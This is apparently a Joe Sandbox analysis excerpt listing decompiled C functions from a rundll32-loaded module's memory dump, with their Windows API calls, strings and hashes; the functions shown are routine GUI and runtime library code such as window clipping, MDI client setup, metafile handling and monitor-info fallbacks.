                          • Opcode Fuzzy Hash: 497a1b5d73bc6f7646845c49dd53b7856febeed75787d5bd5f7aa2980b61dbcb
                          • Instruction Fuzzy Hash: A5513778A042199FDB11DF98D885BEDB7B9EB08304F5144A1E908E7790D775AE41CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E028606AC(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __edi, void* __eflags) {
                          				intOrPtr _v8;
                          				struct tagRECT _v24;
                          				struct tagRECT _v40;
                          				struct HDC__* _t127;
                          				void* _t128;
                          				intOrPtr _t142;
                          				void* _t147;
                          				void* _t149;
                          
                          				_t149 = __eflags;
                          				_t128 = __ecx;
                          				_t127 = __edx;
                          				_v8 = __eax;
                          				GetClientRect(E02833F7C(_v8),  &_v24);
                          				GetWindowRect(E02833F7C(_v8),  &_v40);
                          				MapWindowPoints(0, E02833F7C(_v8),  &_v40, 2);
                          				OffsetRect( &_v24,  ~(_v40.left),  ~(_v40.top));
                          				ExcludeClipRect(_t127, _v24, _v24.top, _v24.right, _v24.bottom);
                          				OffsetRect( &_v40,  ~(_v40.left),  ~(_v40.top));
                          				_push(_t147);
                          				_push(0x2860829);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t147 + 0xffffffdc;
                          				E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _t127);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t128,  *((intOrPtr*)(E02855D3C(_v8, _t149) + 0x7c)), __edi, _t147);
                          				E027F7CA4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x14)), _t128,  *((intOrPtr*)(E02855D3C(_v8, _t149) + 0x40)), __edi, _t147, _t149);
                          				E027F8294( &_v40);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t128,  *((intOrPtr*)(E02855D3C(_v8, _t149) + 0x34)), __edi, _t147);
                          				E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), 1, 1);
                          				E027F8150( *((intOrPtr*)(_v8 + 0x21c)),  *((intOrPtr*)(_v8 + 0x4c)) - 1, 1);
                          				_pop(_t142);
                          				 *[fs:eax] = _t142;
                          				_push(0x2860830);
                          				IntersectClipRect(E027F84EC( *((intOrPtr*)(_v8 + 0x21c))), _v40, _v40.top, _v40.right, _v40.bottom);
                          				return E027F856C( *((intOrPtr*)(_v8 + 0x21c)), 0);
                          			}

                          APIs
                          • GetClientRect.USER32(00000000,?), ref: 028606C5
                          • GetWindowRect.USER32(00000000,?), ref: 028606D7
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 028606ED
                          • OffsetRect.USER32(?,?,?), ref: 02860702
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 02860718
                          • OffsetRect.USER32(?,?,?), ref: 0286072D
                            • Part of subcall function 027F81B0: MoveToEx.GDI32(00000000,?,?,00000000), ref: 027F81CE
                            • Part of subcall function 027F8150: LineTo.GDI32(?), ref: 027F8173
                          • IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 02860813
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$ClipOffsetWindow$ClientExcludeIntersectLineMovePoints
                          • String ID:
                          • API String ID: 2350720055-0
                          • Opcode ID: 0c7f37bd23645d79e7cc7b158d29e77166a999e02659c420c982e54a16b39c2d
                          • Instruction ID: 57d8409b0254892770e6d6fa05d4a5e772925f28baf1f1c165a936cd42cdcaba
                          • Opcode Fuzzy Hash: 0c7f37bd23645d79e7cc7b158d29e77166a999e02659c420c982e54a16b39c2d
                          • Instruction Fuzzy Hash: E6418279A44108AFDB41EBA8D989EEEB7F9AF0C300F6144A1E905E7351C735EE019F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02817FA0(intOrPtr __eax, void* __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v16;
                          				char* _t42;
                          				intOrPtr _t43;
                          				void* _t46;
                          				void* _t50;
                          				void* _t52;
                          				void* _t54;
                          				intOrPtr _t55;
                          				void* _t72;
                          				long _t81;
                          
                          				_v8 = __eax;
                          				E028148C4(_v8);
                          				_t42 =  *0x28644d4; // 0x2865b98
                          				if( *_t42 != 0) {
                          					if( *((char*)(_v8 + 0x229)) == 3) {
                          						SendMessageA(E02833F7C(_v8), 0x80, 1, 0);
                          					} else {
                          						_t81 = E02818B60(_v8);
                          						SendMessageA(E02833F7C(_v8), 0x80, 1, _t81);
                          					}
                          				}
                          				_t43 = _v8;
                          				if(( *(_t43 + 0x1c) & 0x00000010) != 0) {
                          					return _t43;
                          				} else {
                          					_t46 =  *((intOrPtr*)(_v8 + 0x22f)) - 2;
                          					if(_t46 == 0) {
                          						_v12 = 0xff00;
                          						_v16 = 0;
                          						if( *((intOrPtr*)(_v8 + 0x258)) != 0) {
                          							_v16 = E028238BC( *((intOrPtr*)(_v8 + 0x258)));
                          						}
                          						_t50 = E0282D154(_v8);
                          						_t52 = E0282D198(_v8);
                          						_t54 = E02833F7C(_v8);
                          						_t55 =  *0x2865668; // 0x27d0000
                          						 *(_v8 + 0x254) = E027D6FCC(0x200, "MDICLIENT",  &_v16, _t55, 0, _t54, _t52, _t50, 0, 0, 0x56330001);
                          						 *(_v8 + 0x278) = E027F48F8(E028169E4, _v8);
                          						 *((intOrPtr*)(_v8 + 0x274)) = GetWindowLongA( *(_v8 + 0x254), 0xfffffffc);
                          						return SetWindowLongA( *(_v8 + 0x254), 0xfffffffc,  *(_v8 + 0x278));
                          					}
                          					_t72 = _t46 - 1;
                          					if(_t72 == 0) {
                          						return SetWindowPos(E02833F7C(_v8), 0xffffffff, 0, 0, 0, 0, 0x13);
                          					}
                          					return _t72;
                          				}
                          			}

                          APIs
                          • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 02817FE0
                          • SendMessageA.USER32(00000000,00000080,00000001,00000000), ref: 02817FF9
                          • GetWindowLongA.USER32(?,000000FC), ref: 028180BB
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 028180DF
                          • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 028180FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Window$LongMessageSend
                          • String ID: MDICLIENT
                          • API String ID: 642794312-871263795
                          • Opcode ID: e76eeb068c0ef5b3a04a0bce8274277abcdf86ed168fa633ede5f82950e3b595
                          • Instruction ID: 709ca999b5c0ff1b7ba24054d9d8c24e142d6e024597d4db2a21fb2a18395e66
                          • Opcode Fuzzy Hash: e76eeb068c0ef5b3a04a0bce8274277abcdf86ed168fa633ede5f82950e3b595
                          • Instruction Fuzzy Hash: F9411278A44148FFEB51EBA8CD4AF9DB7F9AB04700F2441A0B514EB2D1C775AE44DB44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E027FB26C(void* __eax, void* __edx) {
                          				BYTE* _v8;
                          				int _v12;
                          				struct HDC__* _v16;
                          				short _v18;
                          				signed int _v24;
                          				short _v26;
                          				short _v28;
                          				char _v38;
                          				void* __ebx;
                          				void* __ebp;
                          				signed int _t35;
                          				void* _t66;
                          				intOrPtr _t68;
                          				intOrPtr _t78;
                          				void* _t81;
                          				void* _t84;
                          				void* _t86;
                          				intOrPtr _t87;
                          
                          				_t84 = _t86;
                          				_t87 = _t86 + 0xffffffdc;
                          				_t81 = __edx;
                          				_t66 = __eax;
                          				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                          					return __eax;
                          				} else {
                          					E027D2C20( &_v38, 0x16);
                          					_t68 =  *((intOrPtr*)(_t66 + 0x28));
                          					_v38 = 0x9ac6cdd7;
                          					_t35 =  *((intOrPtr*)(_t68 + 0x18));
                          					if(_t35 != 0) {
                          						_v24 = _t35;
                          					} else {
                          						_v24 = 0x60;
                          					}
                          					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                          					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                          					_v18 = E027F962C( &_v38);
                          					_v16 = GetDC(0);
                          					_push(_t84);
                          					_push(0x27fb3a7);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t87;
                          					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
                          					_v8 = E027D277C(_v12);
                          					_push(_t84);
                          					_push(0x27fb387);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t87;
                          					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
                          						E027F883C(_t68);
                          					}
                          					E027EDB68(_t81, 0x16,  &_v38);
                          					E027EDB68(_t81, _v12, _v8);
                          					_pop(_t78);
                          					 *[fs:eax] = _t78;
                          					_push(0x27fb38e);
                          					return E027D279C(_v8);
                          				}
                          			}

                          APIs
                          • MulDiv.KERNEL32(?,?,000009EC), ref: 027FB2BE
                          • MulDiv.KERNEL32(?,?,000009EC), ref: 027FB2D5
                          • GetDC.USER32(00000000), ref: 027FB2EC
                          • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,027FB3A7,?,00000000,?,?,000009EC,?,?,000009EC), ref: 027FB310
                          • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,027FB387,?,?,00000000,00000000,00000008,?,00000000,027FB3A7), ref: 027FB343
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: BitsFileMeta
                          • String ID: `
                          • API String ID: 858000408-2679148245
                          • Opcode ID: 9e65907d3ef0bc4d19bff0ce90291ea4565f878e7e576613bf34e9e3f1b4a4e8
                          • Instruction ID: 34befc2050ca2970819c7fbfcf90e23b2dd1d3c8d9883b7a716dd61dda4ea286
                          • Opcode Fuzzy Hash: 9e65907d3ef0bc4d19bff0ce90291ea4565f878e7e576613bf34e9e3f1b4a4e8
                          • Instruction Fuzzy Hash: A4314075A44208ABDF41EFE8D885AAEB7BDEF0C710F504495EA04EB341D735AE00DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 56%
                          			E02821810(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                          				intOrPtr _v8;
                          				void* __ecx;
                          				intOrPtr _t9;
                          				void* _t11;
                          				intOrPtr _t17;
                          				void* _t28;
                          				intOrPtr _t33;
                          				intOrPtr _t34;
                          				intOrPtr _t37;
                          				struct HINSTANCE__* _t41;
                          				void* _t43;
                          				intOrPtr _t45;
                          				intOrPtr _t46;
                          
                          				_t45 = _t46;
                          				_push(__ebx);
                          				_t43 = __edx;
                          				_t28 = __eax;
                          				if( *0x2865b7c == 0) {
                          					 *0x2865b7c = E027DC45C("comctl32.dll", __eax);
                          					if( *0x2865b7c >= 0x60000) {
                          						_t41 = GetModuleHandleA("comctl32.dll");
                          						if(_t41 != 0) {
                          							 *0x2865b80 = GetProcAddress(_t41, "ImageList_WriteEx");
                          						}
                          					}
                          				}
                          				_v8 = E027F4360(_t43, 1, 0);
                          				_push(_t45);
                          				_push(0x282190a);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t46;
                          				if( *0x2865b80 == 0) {
                          					_t9 = _v8;
                          					if(_t9 != 0) {
                          						_t9 = _t9 - 0xffffffec;
                          					}
                          					_push(_t9);
                          					_t11 = E028203AC(_t28);
                          					_push(_t11);
                          					L027FEF64();
                          					if(_t11 == 0) {
                          						_t33 =  *0x2864488; // 0x27f53cc
                          						E027DBC80(_t33, 1);
                          						E027D3A9C();
                          					}
                          				} else {
                          					_t17 = _v8;
                          					if(_t17 != 0) {
                          						_t17 = _t17 - 0xffffffec;
                          					}
                          					_push(_t17);
                          					_push(1);
                          					_push(E028203AC(_t28));
                          					if( *0x2865b80() != 0) {
                          						_t34 =  *0x2864488; // 0x27f53cc
                          						E027DBC80(_t34, 1);
                          						E027D3A9C();
                          					}
                          				}
                          				_pop(_t37);
                          				 *[fs:eax] = _t37;
                          				_push(0x2821911);
                          				return E027D320C(_v8);
                          			}

















                          APIs
                            • Part of subcall function 027DC45C: 74771510.VERSION(00000000,?,00000000,027DC532), ref: 027DC49E
                            • Part of subcall function 027DC45C: 747714F0.VERSION(00000000,?,00000000,?,00000000,027DC515,?,00000000,?,00000000,027DC532), ref: 027DC4D3
                            • Part of subcall function 027DC45C: 74771530.VERSION(?,027DC544,?,?,00000000,?,00000000,?,00000000,027DC515,?,00000000,?,00000000,027DC532), ref: 027DC4ED
                          • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 02821844
                          • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 02821855
                          • 74470EC0.COMCTL32(00000000,?,00000000,0282190A), ref: 028218D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: 744707477147477151074771530AddressHandleModuleProc
                          • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                          • API String ID: 3941436784-3125200627
                          • Opcode ID: 285fe3251db0d309f749525e7169e3bcae2ca31ee4bb78b6d4a2a26704a4d8e9
                          • Instruction ID: 080efacf234b7bc223d80158ffa2e4419f31e8458854c28a15de577cce35a4bb
                          • Opcode Fuzzy Hash: 285fe3251db0d309f749525e7169e3bcae2ca31ee4bb78b6d4a2a26704a4d8e9
                          • Instruction Fuzzy Hash: C021D67CB40215AFD711EB78DC8CB2A37AEEB44714F911428E809DB292DB34D898CF21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E027F4FD8(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0x28658bd != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *((intOrPtr*)(_t29 + 8)) = 0;
                          						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                          						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L027D675C();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					_t26 =  *0x28658a4; // 0x27f4fd8
                          					 *0x28658a4 = E027F4BD4(5, _t23, _t26, _t27, _t29);
                          					_t24 =  *0x28658a4(_t27, _t29);
                          				}
                          				return _t24;
                          			}















                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 027F5030
                          • GetSystemMetrics.USER32(00000000), ref: 027F5045
                          • GetSystemMetrics.USER32(00000001), ref: 027F5050
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 027F507A
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoA
                          • API String ID: 2545840971-1370492664
                          • Opcode ID: e3174c3286056ce36f9de14a6ce09518dc650fff4a102279b3e68c2c80d17bde
                          • Instruction ID: bd4e2d6bf95c061b22ef18f1f0c231f168da8d86bc2ef5879bc029ab0850a11c
                          • Opcode Fuzzy Hash: e3174c3286056ce36f9de14a6ce09518dc650fff4a102279b3e68c2c80d17bde
                          • Instruction Fuzzy Hash: A011AC35A457049FDB60DE74D848BA7B7E9FF05311F800929EE599BB80D7B0A445CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E027F50AC(intOrPtr _a4, intOrPtr* _a8) {
                          				void _v20;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t23;
                          				int _t24;
                          				intOrPtr _t26;
                          				intOrPtr _t27;
                          				intOrPtr* _t29;
                          				intOrPtr* _t31;
                          
                          				_t29 = _a8;
                          				_t27 = _a4;
                          				if( *0x28658be != 0) {
                          					_t24 = 0;
                          					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *((intOrPtr*)(_t29 + 8)) = 0;
                          						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                          						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t31 = _t29;
                          						 *(_t31 + 0x24) = 1;
                          						if( *_t31 >= 0x4c) {
                          							_push("DISPLAY");
                          							_push(_t31 + 0x28);
                          							L027D675C();
                          						}
                          						_t24 = 1;
                          					}
                          				} else {
                          					_t26 =  *0x28658a8; // 0x27f50ac
                          					 *0x28658a8 = E027F4BD4(6, _t23, _t26, _t27, _t29);
                          					_t24 =  *0x28658a8(_t27, _t29);
                          				}
                          				return _t24;
                          			}















                          APIs
                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 027F5104
                          • GetSystemMetrics.USER32(00000000), ref: 027F5119
                          • GetSystemMetrics.USER32(00000001), ref: 027F5124
                          • lstrcpy.KERNEL32(?,DISPLAY), ref: 027F514E
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                          • String ID: DISPLAY$GetMonitorInfoW
                          • API String ID: 2545840971-2774842281
                          • Opcode ID: fd33463561f08eb04834a25abbfad5086ec1f2c5ed164be0ed03ad33e0dfc4a7
                          • Instruction ID: 2d97c991682431899fc5a4438d5488f96a06f5ac715916a2d06f2263e7d71d03
                          • Opcode Fuzzy Hash: fd33463561f08eb04834a25abbfad5086ec1f2c5ed164be0ed03ad33e0dfc4a7
                          • Instruction Fuzzy Hash: 8511E639A44304AFD760DF68DC487A7B7E9EF05714F814929EE5997780D370B440CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E027FB8F0(int __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				struct HDC__* _v16;
                          				void* _v20;
                          				struct tagRGBQUAD _v1044;
                          				int _t16;
                          				int _t37;
                          				intOrPtr _t44;
                          				void* _t46;
                          				void* _t49;
                          				void* _t51;
                          				intOrPtr _t52;
                          
                          				_t16 = __eax;
                          				_t49 = _t51;
                          				_t52 = _t51 + 0xfffffbf0;
                          				_v8 = __edx;
                          				_t46 = __eax;
                          				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                          					L4:
                          					return _t16;
                          				} else {
                          					_t16 = E027F9078(_v8, 0xff,  &_v1044);
                          					_t37 = _t16;
                          					if(_t37 == 0) {
                          						goto L4;
                          					} else {
                          						_v12 = GetDC(0);
                          						_v16 = CreateCompatibleDC(_v12);
                          						_v20 = SelectObject(_v16, _t46);
                          						_push(_t49);
                          						_push(0x27fb99f);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t52;
                          						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
                          						_pop(_t44);
                          						 *[fs:eax] = _t44;
                          						_push(0x27fb9a6);
                          						SelectObject(_v16, _v20);
                          						DeleteDC(_v16);
                          						return ReleaseDC(0, _v12);
                          					}
                          				}
                          			}
















                          APIs
                            • Part of subcall function 027F9078: GetObjectA.GDI32(?,00000004), ref: 027F908F
                            • Part of subcall function 027F9078: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 027F90B2
                          • GetDC.USER32(00000000), ref: 027FB92E
                          • CreateCompatibleDC.GDI32(?), ref: 027FB93A
                          • SelectObject.GDI32(?), ref: 027FB947
                          • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,027FB99F,?,?,?,?,00000000), ref: 027FB96B
                          • SelectObject.GDI32(?,?), ref: 027FB985
                          • DeleteDC.GDI32(?), ref: 027FB98E
                          • ReleaseDC.USER32(00000000,?), ref: 027FB999
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                          • String ID:
                          • API String ID: 4046155103-0
                          • Opcode ID: a26e56a694d4a40ff68ad9f63c44ca4582ba2e6a3a51af772618d7a9fd8d963d
                          • Instruction ID: 7e1af5a8c0beec6d81401b87b2837827e5a148ecd8537895a19745dff69a1a30
                          • Opcode Fuzzy Hash: a26e56a694d4a40ff68ad9f63c44ca4582ba2e6a3a51af772618d7a9fd8d963d
                          • Instruction Fuzzy Hash: 65116DB6E04209ABDB51EFE8DC84EAEB7BDEF48704F4044A5AA18E7240D77199408B65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E0281C130(intOrPtr __eax, void* __ecx, short __edx) {
                          				intOrPtr _v8;
                          				short _v10;
                          				struct tagPOINT _v18;
                          				struct HWND__* _v24;
                          				long _v28;
                          				intOrPtr _t29;
                          				long _t38;
                          				void* _t50;
                          
                          				_t50 = __ecx;
                          				_v10 = __edx;
                          				_v8 = __eax;
                          				if(_v10 ==  *((intOrPtr*)(_v8 + 0x44))) {
                          					L6:
                          					_t29 = _v8;
                          					 *((intOrPtr*)(_t29 + 0x48)) =  *((intOrPtr*)(_t29 + 0x48)) + 1;
                          					return _t29;
                          				}
                          				 *((short*)(_v8 + 0x44)) = _v10;
                          				if(_v10 != 0) {
                          					L5:
                          					SetCursor(E0281C0D4(_v8, _v10));
                          					goto L6;
                          				}
                          				GetCursorPos( &_v18);
                          				_push(_v18.y);
                          				_v24 = WindowFromPoint(_v18);
                          				if(_v24 == 0) {
                          					goto L5;
                          				}
                          				_t38 = GetWindowThreadProcessId(_v24, 0);
                          				if(_t38 != GetCurrentThreadId()) {
                          					goto L5;
                          				}
                          				_v28 = SendMessageA(_v24, 0x84, 0, E027D6FA4( &_v18, _t50));
                          				return SendMessageA(_v24, 0x20, _v24, E027D6EF4(_v28, 0x200));
                          			}












                          APIs
                          • GetCursorPos.USER32(?), ref: 0281C165
                          • WindowFromPoint.USER32(?,?,?), ref: 0281C170
                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0281C184
                          • GetCurrentThreadId.KERNEL32 ref: 0281C18B
                          • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0281C1A8
                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0281C1C8
                          • SetCursor.USER32(00000000), ref: 0281C1DC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                          • String ID:
                          • API String ID: 1770779139-0
                          • Opcode ID: 35b66f4ac1beeb866154e5d90ae45f5087497cab6e02366f9d3a133472dad1b8
                          • Instruction ID: 7f3d1a991febcce2cea210d60a45c913f5c5001e68bc571498b878e526b4a69b
                          • Opcode Fuzzy Hash: 35b66f4ac1beeb866154e5d90ae45f5087497cab6e02366f9d3a133472dad1b8
                          • Instruction Fuzzy Hash: 7D21DD79E40209EBDF01EBE5D945AEEB3BEAF08704F504051A604FB291E7719E40CBA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DBAFC(void* __edx, void* __edi, void* __fp0) {
                          				void _v1024;
                          				char _v1088;
                          				long _v1092;
                          				void* _t12;
                          				char* _t14;
                          				intOrPtr _t16;
                          				intOrPtr _t18;
                          				intOrPtr _t24;
                          				long _t32;
                          
                          				E027DB974(_t12,  &_v1024, __edx, __fp0, 0x400);
                          				_t14 =  *0x286465c; // 0x286504c
                          				if( *_t14 == 0) {
                          					_t16 =  *0x28643a0; // 0x27d72c4
                          					_t9 = _t16 + 4; // 0xffec
                          					_t18 =  *0x2865668; // 0x27d0000
                          					LoadStringA(E027D5568(_t18),  *_t9,  &_v1088, 0x40);
                          					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                          				}
                          				_t24 =  *0x2864400; // 0x286521c
                          				E027D28E4(E027D2A70(_t24));
                          				CharToOemA( &_v1024,  &_v1024);
                          				_t32 = E027D8B88( &_v1024, __edi);
                          				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
                          				return WriteFile(GetStdHandle(0xfffffff4), 0x27dbbc0, 2,  &_v1092, 0);
                          			}













                          APIs
                            • Part of subcall function 027DB974: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DB991
                            • Part of subcall function 027DB974: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DB9B5
                            • Part of subcall function 027DB974: GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DB9D0
                            • Part of subcall function 027DB974: LoadStringA.USER32(00000000,0000FFEB,?,00000100), ref: 027DBA66
                          • CharToOemA.USER32(?,?), ref: 027DBB33
                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,0281E749), ref: 027DBB50
